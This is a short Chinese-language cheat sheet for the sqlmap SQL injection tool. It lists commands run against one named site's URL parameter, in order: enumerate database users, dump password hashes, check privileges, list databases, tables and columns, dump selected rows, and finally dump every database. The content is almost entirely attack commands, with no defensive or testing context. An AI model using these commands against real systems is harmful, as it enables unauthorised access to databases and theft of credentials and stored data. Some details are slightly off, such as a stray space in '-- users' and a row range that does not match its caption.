sqlmap automatic SQL injection and database takeover tool
1 |
获取数据库用户 |
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 -- users -v 1 |
获取数据库用户的密码
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --passwords -v 1 |
判断当前的权限
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --privileges -v 1 |
将所有的数据库列出来
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dbs -v 1 |
显示数据库的所有表
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --tables -D "Database_name" -v 1 |
查询列
1 2 3 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --columns -T "Table_name" -D "Database_name" -v 1 |
查询第1到第4行的内容
1 2 3 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dump -T "Table_name" --start 2 --stop 4 -v 1 |
将所有的库导出来,脱裤子.
1 |
python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dump-all -v 1 |
No Comments